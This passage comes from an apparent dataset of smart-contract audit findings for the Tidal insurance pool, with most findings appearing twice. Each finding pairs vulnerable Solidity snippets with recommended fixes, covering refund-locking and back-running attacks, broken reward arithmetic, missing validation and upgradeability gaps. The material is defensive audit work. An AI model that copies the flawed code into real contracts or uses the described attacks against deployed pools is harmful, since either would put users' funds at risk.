insurance holder by calling `refund`. The `refund` function can't be called more than once for a given combination of `policyIndex_`, `week_`, and `who_`, as it would revert with an “Already refunded” error. This gives an attacker the opportunity to call `refund` on behalf of any insurance holder with value 0 inside the `refundMap`, causing any future `refund` allocated for that holder in a given week and for a given policy to be locked forever in the contract (unless the contract is upgraded).\\n```\\nfunction refund(\\n uint256 policyIndex\\_,\\n uint256 week\\_,\\n address who\\_\\n) external noReenter {\\n Coverage storage coverage = coverageMap[policyIndex\\_][week\\_][who\\_];\\n\\n require(!coverage.refunded, ""Already refunded"");\\n\\n uint256 allCovered = coveredMap[policyIndex\\_][week\\_];\\n uint256 amountToRefund = refundMap[policyIndex\\_][week\\_].mul(\\n coverage.amount).div(allCovered);\\n coverage.amount = coverage.amount.mul(\\n coverage.premium.sub(amountToRefund)).div(coverage.premium);\\n coverage.refunded = true;\\n\\n IERC20(baseToken).safeTransfer(who\\_, amountToRefund);\\n\\n if (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).refund(\\n policyIndex\\_,\\n week\\_,\\n who\\_,\\n amountToRefund\\n );\\n }\\n}\\n```\\n",There should be a validation check at the beginning of the function that reverts if `refundMap[policyIndex_][week_] == 0`.,,"```\\nfunction refund(\\n uint256 policyIndex\\_,\\n uint256 week\\_,\\n address who\\_\\n) external noReenter {\\n Coverage storage coverage = coverageMap[policyIndex\\_][week\\_][who\\_];\\n\\n require(!coverage.refunded, ""Already refunded"");\\n\\n uint256 allCovered = coveredMap[policyIndex\\_][week\\_];\\n uint256 amountToRefund = refundMap[policyIndex\\_][week\\_].mul(\\n coverage.amount).div(allCovered);\\n coverage.amount = coverage.amount.mul(\\n coverage.premium.sub(amountToRefund)).div(coverage.premium);\\n coverage.refunded = true;\\n\\n IERC20(baseToken).safeTransfer(who\\_, amountToRefund);\\n\\n if (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).refund(\\n policyIndex\\_,\\n week\\_,\\n who\\_,\\n amountToRefund\\n );\\n }\\n}\\n```\\n" +"addTidal, _updateUserTidal, withdrawTidal - wrong arithmetic calculations",high,"To further incentivize sellers, anyone - although it will usually be the pool manager - can send an arbitrary amount of the Tidal token to a pool, which is then supposed to be distributed proportionally among the share owners. There are several flaws in the calculations that implement this mechanism:\\nA. addTidal:\\n```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS)).div(poolInfo.totalShare);\\n```\\n\\nThis should be:\\n```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS).div(poolInfo.totalShare));\\n```\\n\\nNote the different parenthesization. Without SafeMath:\\n```\\npoolInfo.accTidalPerShare += amount\\_ \\* SHARE\\_UNITS / poolInfo.totalShare;\\n```\\n\\nB. _updateUserTidal:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.add(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nThis should be:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.mul(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nNote that `add` has been replaced with `mul`. Without SafeMath:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare \\* userInfo.share / SHARE\\_UNITS;\\n```\\n\\nC. withdrawTidal:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.add(userInfo.share);\\n```\\n\\nAs in B, this should be:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.mul(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nNote that `add` has been replaced with `mul` and that a division by `SHARE_UNITS` has been appended. Without SafeMath:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare \\* userInfo.share / SHARE\\_UNITS;\\n```\\n\\nAs an additional minor point, the division in `addTidal` will revert with a panic (0x12) if the number of shares in the pool is zero. This case could be handled more gracefully.",Implement the fixes described above. The versions without `SafeMath` are easier to read and should be preferred; see https://github.com/ConsensysDiligence/tidal-audit-2023-04/issues/20.,,```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS)).div(poolInfo.totalShare);\\n```\\n +claim - Incomplete and lenient implementation,high,"In the current version of the code, the `claim` function is lacking crucial input validation logic as well as required state changes. Most of the process is implemented in other contracts or off-chain at the moment and is therefore out of scope for this audit, but there might still be issues caused by potential errors in the process. Moreover, pool manager and committee together have unlimited ownership of the deposits and can essentially withdraw all collateral to any desired address.\\n```\\nfunction claim(\\n uint256 policyIndex\\_,\\n uint256 amount\\_,\\n address receipient\\_\\n) external onlyPoolManager {\\n```\\n","To ensure a more secure claiming process, we propose adding the following logic to the `claim` function:\\n`refund` should be called at the beginning of the `claim` flow, so that the recipient's true coverage amount will be used.\\n`policyIndex` should be added as a parameter to this function, so that `coverageMap` can be used to validate that the amount claimed on behalf of a recipient is covered.\\nThe payout amount should be subtracted in the `coveredMap` and `coverageMap` mappings.",,"```\\nfunction claim(\\n uint256 policyIndex\\_,\\n uint256 amount\\_,\\n address receipient\\_\\n) external onlyPoolManager {\\n```\\n" +buy - insurance buyers trying to increase their coverage amount will lose their previous coverage,high,"When a user is willing to `buy` insurance, he is required to specify the desired amount (denoted as amount_) and to pay the entire premium upfront. In return, he receives the ownership over an entry inside the `coverageMap` mapping. If a user calls the `buy` function more than once for the same policy and time frame, his entry in the `coverageMap` will not represent the accumulated amount that he paid for but only the last coverage amount, which means previous coverage will be lost forever (unless the contract is upgraded).\\n```\\nfor (uint256 w = fromWeek\\_; w < toWeek\\_; ++w) {\\n incomeMap[policyIndex\\_][w] =\\n incomeMap[policyIndex\\_][w].add(premium);\\n coveredMap[policyIndex\\_][w] =\\n coveredMap[policyIndex\\_][w].add(amount\\_);\\n\\n require(coveredMap[policyIndex\\_][w] <= maximumToCover,\\n ""Not enough to buy"");\\n\\n coverageMap[policyIndex\\_][w][\\_msgSender()] = Coverage({\\n amount: amount\\_,\\n premium: premium,\\n refunded: false\\n });\\n}\\n```\\n",The coverage entry that represents the user's coverage should not be overwritten but should hold the accumulated amount of coverage instead.,,"```\\nfor (uint256 w = fromWeek\\_; w < toWeek\\_; ++w) {\\n incomeMap[policyIndex\\_][w] =\\n incomeMap[policyIndex\\_][w].add(premium);\\n coveredMap[policyIndex\\_][w] =\\n coveredMap[policyIndex\\_][w].add(amount\\_);\\n\\n require(coveredMap[policyIndex\\_][w] <= maximumToCover,\\n ""Not enough to buy"");\\n\\n coverageMap[policyIndex\\_][w][\\_msgSender()] = Coverage({\\n amount: amount\\_,\\n premium: premium,\\n refunded: false\\n });\\n}\\n```\\n" +Several issues related to upgradeability of contracts,medium,"We did not find a proxy contract or factory in the repository, but the README contains the following information:\\ncode/README.md:L11\\n```\\nEvery Pool is a standalone smart contract. It is made upgradeable with OpenZeppelin's Proxy Upgrade Pattern.\\n```\\n\\ncode/README.md:L56\\n```\\nAnd there will be multiple proxies and one implementation of the Pools, and one proxy and one implementation of EventAggregator.\\n```\\n\\nThere are several issues related to upgradeability or, generally, using the contracts as implementations for proxies. All recommendations in this report assume that it is not necessary to remain compatible with an existing deployment.\\nB. If upgradeability is supposed to work with inheritance, there should be dummy variables at the end of each contract in the inheritance hierarchy. Some of these have to be removed when “real” state variables are added. More precisely, it is conventional to use a fixed-size `uint256` array `__gap`, such that the consecutively occupied slots at the beginning (for the “real” state variables) add up to 50 with the size of the array. If state variables are added later, the gap's size has to be reduced accordingly to maintain this invariant. Currently, the contracts do not declare such a `__gap` variable.\\nC. Implementation contracts should not remain uninitalized. To prevent initialization by an attacker - which, in some cases, can have an impact on the proxy - the implementation contract's constructor should call `_disableInitializers`.","Refamiliarize yourself with the subtleties and pitfalls of upgradeable `contracts`, in particular regarding state variables and the storage gap. A lot of useful information can be found here.\\nOnly import from `contracts-upgradeable`, not from `contracts`.\\nAdd appropriately-sized storage gaps at least to `PoolModel`, `NonReentrancy`, and `EventAggregator`. (Note that adding a storage gap to `NonReentrancy` will break compatibility with existing deployments.) Ideally, add comments and warnings to each file that state variables may only be added at the end, that the storage gap's size has to be reduced accordingly, and that state variables must not be removed, rearranged, or in any way altered (e.g., type, `constant`, immutable). No state variables should ever be added to the `Pool` contract, and a comment should make that clear.\\nAdd a constructor to `Pool` and `EventAggregator` that calls `_disableInitializers`.",,```\\nEvery Pool is a standalone smart contract. It is made upgradeable with OpenZeppelin's Proxy Upgrade Pattern.\\n```\\n +initialize - Committee members array can contain duplicates,medium,"The initial committee members are given as array argument to the pool's `initialize` function. When the array is processed, there is no check for duplicates, and duplicates may also end up in the storage array `committeeArray`.\\n```\\nfor (uint256 i = 0; i < committeeMembers\\_.length; ++i) {\\n address member = committeeMembers\\_[i];\\n committeeArray.push(member);\\n committeeIndexPlusOne[member] = committeeArray.length;\\n}\\n```\\n\\nDuplicates will result in a discrepancy between the length of the array - which is later interpreted as the number of committee members - and the actual number of (different) committee members. This could lead to more problems, such as an insufficient committee size to reach the threshold.","The `initialize` function should verify in the loop that `member` hasn't been added before. Note that `_executeAddToCommittee` refuses to add someone who is already in the committee, and the same technique can be employed here.",,```\\nfor (uint256 i = 0; i < committeeMembers\\_.length; ++i) {\\n address member = committeeMembers\\_[i];\\n committeeArray.push(member);\\n committeeIndexPlusOne[member] = committeeArray.length;\\n}\\n```\\n +Pool.buy- Users may end up paying more than intended due to changes in policy.weeklyPremium,medium,"The price that an insurance buyer has to pay for insurance is determined by the duration of the coverage and the `weeklyPremium`. The price increases as the `weeklyPremium` increases. If a `buy` transaction is waiting in the mempool but eventually front-run by another transaction that increases `weeklyPremium`, the user will end up paying more than they anticipated for the same insurance coverage (assuming their allowance to the `Pool` contract is unlimited or at least higher than what they expected to pay).\\n```\\nuint256 premium = amount\\_.mul(policy.weeklyPremium).div(RATIO\\_BASE);\\nuint256 allPremium = premium.mul(toWeek\\_.sub(fromWeek\\_));\\n```\\n","Consider adding a parameter for the maximum amount to pay, and make sure that the transaction will revert if `allPremium` is greater than this maximum value.",,```\\nuint256 premium = amount\\_.mul(policy.weeklyPremium).div(RATIO\\_BASE);\\nuint256 allPremium = premium.mul(toWeek\\_.sub(fromWeek\\_));\\n```\\n +Missing validation checks in execute,medium,"The `Pool` contract implements a threshold voting mechanism for some changes in the contract state, where either the pool manager or a committee member can propose a change by calling `claim`, `changePoolManager`, `addToCommittee`, `removeFromCommittee`, or `changeCommitteeThreshold`, and then the committee has a time period for voting. If the threshold is reached during this period, then anyone can call `execute` to `execute` the state change.\\nWhile some validation checks are implemented in the proposal phase, this is not enough to ensure that business logic rules around these changes are completely enforced.\\n`_executeRemoveFromCommittee` - While the `removeFromCommittee` function makes sure that `committeeArray.length > committeeThreshold`, i.e., that there should always be enough committee members to reach the threshold, the same validation check is not enforced in `_executeRemoveFromCommittee`. To better illustrate the issue, let's consider the following example: `committeeArray.length = 5`, `committeeThreshold = 4`, and now `removeFromCommittee` is called two times in a row, where the second call is made before the first call reaches the threshold. In this case, both requests will be executed successfully, and we end up with `committeeArray.length = 3` and `committeeThreshold = 4`, which is clearly not desired.\\n`_executeChangeCommitteeThreshold` - Applying the same concept here, this function lacks the validation check of `threshold_ <= committeeArray.length`, leading to the same issue as above. Let's consider the following example: `committeeArray.length = 3`, `committeeThreshold = 2`, and now changeCommitteeThresholdis called with `threshold_ = 3`, but before this request is executed, `removeFromCommittee` is called. After both requests have been executed successfully, we will end up with `committeeThreshold = 3` and `committeeArray.length = 2`, which is clearly not desired.\\n```\\nfunction \\_executeRemoveFromCommittee(address who\\_) private {\\n```\\n\\n```\\nfunction \\_executeChangeCommitteeThreshold(uint256 threshold\\_) private {\\n```\\n",Apply the same validation checks in the functions that execute the state change.,,```\\nfunction \\_executeRemoveFromCommittee(address who\\_) private {\\n```\\n +Hard-coded minimum deposit amount,low,"Resolution\\nFixed in 3bbafab926df0ea39f444ef0fd5d2a6197f99a5d by implementing the auditor's recommendation.\\nThe `deposit` function specifies a minimum amount of 1e12 units of the base token for a deposit:\\n```\\nuint256 constant AMOUNT\\_PER\\_SHARE = 1e18;\\n```\\n\\n```\\n// Anyone can be a seller, and deposit baseToken (e.g. USDC or WETH)\\n// to the pool.\\nfunction deposit(\\n uint256 amount\\_\\n) external noReenter {\\n require(enabled, ""Not enabled"");\\n\\n require(amount\\_ >= AMOUNT\\_PER\\_SHARE / 1000000, ""Less than minimum"");\\n```\\n\\nWhether that's an appropriate minimum amount or not depends on the base token. Note that the two example tokens listed above are USDC and WETH. With current ETH prices, 1e12 Wei cost an affordable 0.2 US Cent. USDC, on the other hand, has 6 decimals, so 1e12 units are worth 1 million USD, which is … steep.",The minimum deposit amount should be configurable.,,```\\nuint256 constant AMOUNT\\_PER\\_SHARE = 1e18;\\n```\\n +Outdated Solidity version,low,"The source files' version pragmas either specify that they need compiler version exactly 0.8.10 or at least 0.8.10:\\n```\\npragma solidity 0.8.10;\\n```\\n\\n```\\npragma solidity ^0.8.10;\\n```\\n\\nSolidity v0.8.10 is a fairly dated version that has known security issues. We generally recommend using the latest version of the compiler (at the time of writing, this is v0.8.20), and we also discourage the use of floating pragmas to make sure that the source files are actually compiled and deployed with the same compiler version they have been tested with.","Resolution\\nFixed in 3bbafab926df0ea39f444ef0fd5d2a6197f99a5d by implementing the auditor's recommendation.\\nUse the Solidity compiler v0.8.20, and change the version pragma in all Solidity source files to `pragma solidity 0.8.20;`.",,```\\npragma solidity 0.8.10;\\n```\\n +Code used for testing purposes should be removed before deployment,low,"Variables and logic have been added to the code whose only purpose is to make it easier to test. This might cause unexpected behavior if deployed in production. For instance, `onlyTest` and `setTimeExtra` should be removed from the code before deployment, as well as `timeExtra` in `getCurrentWeek` and `getNow`.\\n```\\nmodifier onlyTest() {\\n```\\n\\n```\\nfunction setTimeExtra(uint256 timeExtra\\_) external onlyTest {\\n```\\n\\n```\\nfunction getCurrentWeek() public view returns(uint256) {\\n return (block.timestamp + TIME\\_OFFSET + timeExtra) / (7 days);\\n}\\n```\\n\\n```\\nfunction getNow() public view returns(uint256) {\\n return block.timestamp + timeExtra;\\n}\\n```\\n","For the long term, consider mimicking this behavior by using features offered by your testing framework.",,```\\nmodifier onlyTest() {\\n```\\n +Missing events,low,Some state-changing functions do not emit an event at all or omit relevant information.\\nA. `Pool.setEventAggregator` should emit an event with the value of `eventAggregator_` so that off-chain services will be notified and can automatically adjust.\\n```\\nfunction setEventAggregator(address eventAggregator\\_) external onlyPoolManager {\\n eventAggregator = eventAggregator\\_;\\n}\\n```\\n\\nB. `Pool.enablePool` should emit an event when the pool is dis- or enabled.\\n```\\nfunction enablePool(bool enabled\\_) external onlyPoolManager {\\n enabled = enabled\\_;\\n}\\n```\\n\\nC. `Pool.execute` only logs the `requestIndex_` while it should also include the `operation` and `data` to better reflect the state change in the transaction.\\n```\\nif (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).execute(\\n requestIndex\\_\\n );\\n}\\n```\\n,State-changing functions should emit an event to have an audit trail and enable monitoring of smart contract usage.,,```\\nfunction setEventAggregator(address eventAggregator\\_) external onlyPoolManager {\\n eventAggregator = eventAggregator\\_;\\n}\\n```\\n +addPremium - A Back Runner May Cause an Insurance Holder to Lose Their Refunds by Calling addPremium Right After the Original Call,high,"`addPremium` is a public function that can be called by anyone and that distributes the weekly premium payments to the pool manager and the rest of the pool share holders. If the collateral deposited is not enough to cover the total coverage offered to insurance holders for a given week, refunds are allocated pro rata for all insurance holders of that particular week and policy. However, in the current implementation, attackers can call `addPremium` right after the original call to `addPremium` but before the call to refund; this will cause the insurance holders to lose their refunds, which will be effectively locked forever in the contract (unless the contract is upgraded).\\n```\\nrefundMap[policyIndex\\_][week] = incomeMap[policyIndex\\_][week].mul(\\n allCovered.sub(maximumToCover)).div(allCovered);\\n```\\n",`addPremium` should contain a validation check in the beginning of the function that reverts for the case of `incomeMap[policyIndex_][week] = 0`.,,```\\nrefundMap[policyIndex\\_][week] = incomeMap[policyIndex\\_][week].mul(\\n allCovered.sub(maximumToCover)).div(allCovered);\\n```\\n +refund - Attacker Can Lock Insurance Holder's Refunds by Calling refund Before a Refund Was Allocated,high,"`addPremium` is used to determine the `refund` amount that an insurance holder is eligible to claim. The amount is stored in the `refundMap` mapping and can then later be claimed by anyone on behalf of an insurance holder by calling `refund`. The `refund` function can't be called more than once for a given combination of `policyIndex_`, `week_`, and `who_`, as it would revert with an “Already refunded” error. This gives an attacker the opportunity to call `refund` on behalf of any insurance holder with value 0 inside the `refundMap`, causing any future `refund` allocated for that holder in a given week and for a given policy to be locked forever in the contract (unless the contract is upgraded).\\n```\\nfunction refund(\\n uint256 policyIndex\\_,\\n uint256 week\\_,\\n address who\\_\\n) external noReenter {\\n Coverage storage coverage = coverageMap[policyIndex\\_][week\\_][who\\_];\\n\\n require(!coverage.refunded, ""Already refunded"");\\n\\n uint256 allCovered = coveredMap[policyIndex\\_][week\\_];\\n uint256 amountToRefund = refundMap[policyIndex\\_][week\\_].mul(\\n coverage.amount).div(allCovered);\\n coverage.amount = coverage.amount.mul(\\n coverage.premium.sub(amountToRefund)).div(coverage.premium);\\n coverage.refunded = true;\\n\\n IERC20(baseToken).safeTransfer(who\\_, amountToRefund);\\n\\n if (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).refund(\\n policyIndex\\_,\\n week\\_,\\n who\\_,\\n amountToRefund\\n );\\n }\\n}\\n```\\n",There should be a validation check at the beginning of the function that reverts if `refundMap[policyIndex_][week_] == 0`.,,"```\\nfunction refund(\\n uint256 policyIndex\\_,\\n uint256 week\\_,\\n address who\\_\\n) external noReenter {\\n Coverage storage coverage = coverageMap[policyIndex\\_][week\\_][who\\_];\\n\\n require(!coverage.refunded, ""Already refunded"");\\n\\n uint256 allCovered = coveredMap[policyIndex\\_][week\\_];\\n uint256 amountToRefund = refundMap[policyIndex\\_][week\\_].mul(\\n coverage.amount).div(allCovered);\\n coverage.amount = coverage.amount.mul(\\n coverage.premium.sub(amountToRefund)).div(coverage.premium);\\n coverage.refunded = true;\\n\\n IERC20(baseToken).safeTransfer(who\\_, amountToRefund);\\n\\n if (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).refund(\\n policyIndex\\_,\\n week\\_,\\n who\\_,\\n amountToRefund\\n );\\n }\\n}\\n```\\n" +"addTidal, _updateUserTidal, withdrawTidal - Wrong Arithmetic Calculations",high,"To further incentivize sellers, anyone - although it will usually be the pool manager - can send an arbitrary amount of the Tidal token to a pool, which is then supposed to be distributed proportionally among the share owners. There are several flaws in the calculations that implement this mechanism:\\nA. addTidal:\\n```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS)).div(poolInfo.totalShare);\\n```\\n\\nThis should be:\\n```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS).div(poolInfo.totalShare));\\n```\\n\\nNote the different parenthesization. Without SafeMath:\\n```\\npoolInfo.accTidalPerShare += amount\\_ \\* SHARE\\_UNITS / poolInfo.totalShare;\\n```\\n\\nB. _updateUserTidal:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.add(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nThis should be:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.mul(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nNote that `add` has been replaced with `mul`. Without SafeMath:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare \\* userInfo.share / SHARE\\_UNITS;\\n```\\n\\nC. withdrawTidal:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.add(userInfo.share);\\n```\\n\\nAs in B, this should be:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.mul(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nNote that `add` has been replaced with `mul` and that a division by `SHARE_UNITS` has been appended. Without SafeMath:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare \\* userInfo.share / SHARE\\_UNITS;\\n```\\n\\nAs an additional minor point, the division in `addTidal` will revert with a panic (0x12) if the number of shares in the pool is zero. This case could be handled more gracefully.",Implement the fixes described above. The versions without `SafeMath` are easier to read and should be preferred; see issue 3.13.,,```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS)).div(poolInfo.totalShare);\\n```\\n +claim - Incomplete and Lenient Implementation,high,"In the current version of the code, the `claim` function is lacking crucial input validation logic as well as required state changes. Most of the process is implemented in other contracts or off-chain at the moment and is therefore out of scope for this audit, but there might still be issues caused by potential errors in the process. Moreover, pool manager and committee together have unlimited ownership of the deposits and can essentially withdraw all collateral to any desired address.\\n```\\nfunction claim(\\n uint256 policyIndex\\_,\\n uint256 amount\\_,\\n address receipient\\_\\n) external onlyPoolManager {\\n```\\n","To ensure a more secure claiming process, we propose adding the following logic to the `claim` function:\\n`refund` should be called at the beginning of the `claim` flow, so that the recipient's true coverage amount will be used.\\n`policyIndex` should be added as a parameter to this function, so that `coverageMap` can be used to validate that the amount claimed on behalf of a recipient is covered.\\nThe payout amount should be subtracted in the `coveredMap` and `coverageMap` mappings.",,"```\\nfunction claim(\\n uint256 policyIndex\\_,\\n uint256 amount\\_,\\n address receipient\\_\\n) external onlyPoolManager {\\n```\\n" +buy - Insurance Buyers Trying to Increase Their Coverage Amount Will Lose Their Previous Coverage,high,"When a user is willing to `buy` insurance, he is required to specify the desired amount (denoted as amount_) and to pay the entire premium upfront. In return, he receives the ownership over an entry inside the `coverageMap` mapping. If a user calls the `buy` function more than once for the same policy and time frame, his entry in the `coverageMap` will not represent the accumulated amount that he paid for but only the last coverage amount, which means previous coverage will be lost forever (unless the contract is upgraded).\\n```\\nfor (uint256 w = fromWeek\\_; w < toWeek\\_; ++w) {\\n incomeMap[policyIndex\\_][w] =\\n incomeMap[policyIndex\\_][w].add(premium);\\n coveredMap[policyIndex\\_][w] =\\n coveredMap[policyIndex\\_][w].add(amount\\_);\\n\\n require(coveredMap[policyIndex\\_][w] <= maximumToCover,\\n ""Not enough to buy"");\\n\\n coverageMap[policyIndex\\_][w][\\_msgSender()] = Coverage({\\n amount: amount\\_,\\n premium: premium,\\n refunded: false\\n });\\n}\\n```\\n",The coverage entry that represents the user's coverage should not be overwritten but should hold the accumulated amount of coverage instead.,,"```\\nfor (uint256 w = fromWeek\\_; w < toWeek\\_; ++w) {\\n incomeMap[policyIndex\\_][w] =\\n incomeMap[policyIndex\\_][w].add(premium);\\n coveredMap[policyIndex\\_][w] =\\n coveredMap[policyIndex\\_][w].add(amount\\_);\\n\\n require(coveredMap[policyIndex\\_][w] <= maximumToCover,\\n ""Not enough to buy"");\\n\\n coverageMap[policyIndex\\_][w][\\_msgSender()] = Coverage({\\n amount: amount\\_,\\n premium: premium,\\n refunded: false\\n });\\n}\\n```\\n" +Several Issues Related to Upgradeability of Contracts,medium,"We did not find a proxy contract or factory in the repository, but the README contains the following information:\\nREADME.md:L11\\n```\\nEvery Pool is a standalone smart contract. It is made upgradeable with OpenZeppelin's Proxy Upgrade Pattern.\\n```\\n\\nREADME.md:L56\\n```\\nAnd there will be multiple proxies and one implementation of the Pools, and one proxy and one implementation of EventAggregator.\\n```\\n\\nThere are several issues related to upgradeability or, generally, using the contracts as implementations for proxies. All recommendations in this report assume that it is not necessary to remain compatible with an existing deployment.\\nB. If upgradeability is supposed to work with inheritance, there should be dummy variables at the end of each contract in the inheritance hierarchy. Some of these have to be removed when “real” state variables are added. More precisely, it is conventional to use a fixed-size `uint256` array `__gap`, such that the consecutively occupied slots at the beginning (for the “real” state variables) add up to 50 with the size of the array. If state variables are added later, the gap's size has to be reduced accordingly to maintain this invariant. Currently, the contracts do not declare such a `__gap` variable.\\nC. Implementation contracts should not remain uninitalized. To prevent initialization by an attacker - which, in some cases, can have an impact on the proxy - the implementation contract's constructor should call `_disableInitializers`.","Refamiliarize yourself with the subtleties and pitfalls of upgradeable `contracts`, in particular regarding state variables and the storage gap. A lot of useful information can be found here.\\nOnly import from `contracts-upgradeable`, not from `contracts`.\\nAdd appropriately-sized storage gaps at least to `PoolModel`, `NonReentrancy`, and `EventAggregator`. (Note that adding a storage gap to `NonReentrancy` will break compatibility with existing deployments.) Ideally, add comments and warnings to each file that state variables may only be added at the end, that the storage gap's size has to be reduced accordingly, and that state variables must not be removed, rearranged, or in any way altered (e.g., type, `constant`, immutable). No state variables should ever be added to the `Pool` contract, and a comment should make that clear.\\nAdd a constructor to `Pool` and `EventAggregator` that calls `_disableInitializers`.",,```\\nEvery Pool is a standalone smart contract. It is made upgradeable with OpenZeppelin's Proxy Upgrade Pattern.\\n```\\n +initialize - Committee Members Array Can Contain Duplicates,medium,"The initial committee members are given as array argument to the pool's `initialize` function. When the array is processed, there is no check for duplicates, and duplicates may also end up in the storage array `committeeArray`.\\n```\\nfor (uint256 i = 0; i < committeeMembers\\_.length; ++i) {\\n address member = committeeMembers\\_[i];\\n committeeArray.push(member);\\n committeeIndexPlusOne[member] = committeeArray.length;\\n}\\n```\\n\\nDuplicates will result in a discrepancy between the length of the array - which is later interpreted as the number of committee members - and the actual number of (different) committee members. This could lead to more problems, such as an insufficient committee size to reach the threshold.","The `initialize` function should verify in the loop that `member` hasn't been added before. Note that `_executeAddToCommittee` refuses to add someone who is already in the committee, and the same technique can be employed here.",,```\\nfor (uint256 i = 0; i < committeeMembers\\_.length; ++i) {\\n address member = committeeMembers\\_[i];\\n committeeArray.push(member);\\n committeeIndexPlusOne[member] = committeeArray.length;\\n}\\n```\\n +Pool.buy- Users May End Up Paying More Than Intended Due to Changes in policy.weeklyPremium,medium,"The price that an insurance buyer has to pay for insurance is determined by the duration of the coverage and the `weeklyPremium`. The price increases as the `weeklyPremium` increases. If a `buy` transaction is waiting in the mempool but eventually front-run by another transaction that increases `weeklyPremium`, the user will end up paying more than they anticipated for the same insurance coverage (assuming their allowance to the `Pool` contract is unlimited or at least higher than what they expected to pay).\\n```\\nuint256 premium = amount\\_.mul(policy.weeklyPremium).div(RATIO\\_BASE);\\nuint256 allPremium = premium.mul(toWeek\\_.sub(fromWeek\\_));\\n```\\n","Consider adding a parameter for the maximum amount to pay, and make sure that the transaction will revert if `allPremium` is greater than this maximum value.",,```\\nuint256 premium = amount\\_.mul(policy.weeklyPremium).div(RATIO\\_BASE);\\nuint256 allPremium = premium.mul(toWeek\\_.sub(fromWeek\\_));\\n```\\n +Missing Validation Checks in execute,medium,"The `Pool` contract implements a threshold voting mechanism for some changes in the contract state, where either the pool manager or a committee member can propose a change by calling `claim`, `changePoolManager`, `addToCommittee`, `removeFromCommittee`, or `changeCommitteeThreshold`, and then the committee has a time period for voting. If the threshold is reached during this period, then anyone can call `execute` to `execute` the state change.\\nWhile some validation checks are implemented in the proposal phase, this is not enough to ensure that business logic rules around these changes are completely enforced.\\n`_executeRemoveFromCommittee` - While the `removeFromCommittee` function makes sure that `committeeArray.length > committeeThreshold`, i.e., that there should always be enough committee members to reach the threshold, the same validation check is not enforced in `_executeRemoveFromCommittee`. To better illustrate the issue, let's consider the following example: `committeeArray.length = 5`, `committeeThreshold = 4`, and now `removeFromCommittee` is called two times in a row, where the second call is made before the first call reaches the threshold. In this case, both requests will be executed successfully, and we end up with `committeeArray.length = 3` and `committeeThreshold = 4`, which is clearly not desired.\\n`_executeChangeCommitteeThreshold` - Applying the same concept here, this function lacks the validation check of `threshold_ <= committeeArray.length`, leading to the same issue as above. Let's consider the following example: `committeeArray.length = 3`, `committeeThreshold = 2`, and now changeCommitteeThresholdis called with `threshold_ = 3`, but before this request is executed, `removeFromCommittee` is called. After both requests have been executed successfully, we will end up with `committeeThreshold = 3` and `committeeArray.length = 2`, which is clearly not desired.\\n```\\nfunction \\_executeRemoveFromCommittee(address who\\_) private {\\n```\\n\\n```\\nfunction \\_executeChangeCommitteeThreshold(uint256 threshold\\_) private {\\n```\\n",Apply the same validation checks in the functions that execute the state change.,,```\\nfunction \\_executeRemoveFromCommittee(address who\\_) private {\\n```\\n +Hard-Coded Minimum Deposit Amount,low,"Resolution\\nFixed in 3bbafab926df0ea39f444ef0fd5d2a6197f99a5d by implementing the auditor's recommendation.\\nThe `deposit` function specifies a minimum amount of 1e12 units of the base token for a deposit:\\n```\\nuint256 constant AMOUNT\\_PER\\_SHARE = 1e18;\\n```\\n\\n```\\n// Anyone can be a seller, and deposit baseToken (e.g. USDC or WETH)\\n// to the pool.\\nfunction deposit(\\n uint256 amount\\_\\n) external noReenter {\\n require(enabled, ""Not enabled"");\\n\\n require(amount\\_ >= AMOUNT\\_PER\\_SHARE / 1000000, ""Less than minimum"");\\n```\\n\\nWhether that's an appropriate minimum amount or not depends on the base token. Note that the two example tokens listed above are USDC and WETH. With current ETH prices, 1e12 Wei cost an affordable 0.2 US Cent. USDC, on the other hand, has 6 decimals, so 1e12 units are worth 1 million USD, which is … steep.",The minimum deposit amount should be configurable.,,```\\nuint256 constant AMOUNT\\_PER\\_SHARE = 1e18;\\n```\\n +Outdated Solidity Version,low,"The source files' version pragmas either specify that they need compiler version exactly 0.8.10 or at least 0.8.10:\\n```\\npragma solidity 0.8.10;\\n```\\n\\n```\\npragma solidity ^0.8.10;\\n```\\n\\nSolidity v0.8.10 is a fairly dated version that has known security issues. We generally recommend using the latest version of the compiler (at the time of writing, this is v0.8.20), and we also discourage the use of floating pragmas to make sure that the source files are actually compiled and deployed with the same compiler version they have been tested with.","Resolution\\nFixed in 3bbafab926df0ea39f444ef0fd5d2a6197f99a5d by implementing the auditor's recommendation.\\nUse the Solidity compiler v0.8.20, and change the version pragma in all Solidity source files to `pragma solidity 0.8.20;`.",,```\\npragma solidity 0.8.10;\\n```\\n +Code Used for Testing Purposes Should Be Removed Before Deployment,low,"Variables and logic have been added 